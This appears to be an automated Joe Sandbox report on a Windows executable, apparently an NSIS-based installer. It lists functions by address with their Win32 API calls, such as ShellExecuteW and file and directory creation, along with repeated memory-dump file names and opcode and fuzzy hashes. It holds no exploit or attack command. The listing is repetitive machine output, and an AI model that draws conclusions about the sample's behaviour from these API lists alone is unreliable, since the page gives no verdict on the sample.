                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringWritelstrcpyn
                                          • String ID: 135$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                          • API String ID: 247603264-2079820476
                                          • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                          • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                          • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                          • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                          Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                          APIs
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                          • API String ID: 3156913733-2180253247
                                          • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                          • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                          • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                          • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                          Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00405E9D
                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: nsa
                                          • API String ID: 1716503409-2209301699
                                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                          • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                          • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                          Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                          • String ID: HideWindow
                                          • API String ID: 1249568736-780306582
                                          • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                          • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                          • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                          • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                          Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                          • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                          • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                          • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                          Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                          • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                          • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                          • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                          Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                          • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                          • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                          • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                          Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                          • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                          • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                          • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                          Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                          • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                          • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                          • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                          Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                          • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                          • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                          • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                          Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalFree.KERNELBASE(?), ref: 004073C5
                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                          • GlobalFree.KERNELBASE(?), ref: 0040743D
                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Global$AllocFree
                                          • String ID:
                                          • API String ID: 3394109436-0
                                          • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                          • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                          • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                          • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                          Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                          • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                          • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                          • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                          Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                          • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                          • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                          • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                          Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                          • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                          • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                          • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                          Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                          • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                          • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                          • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                          Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                          • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Char$Next$CreateDirectoryPrev
                                          • String ID:
                                          • API String ID: 4115351271-0
                                          • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                          • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                          • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                          • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                          Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
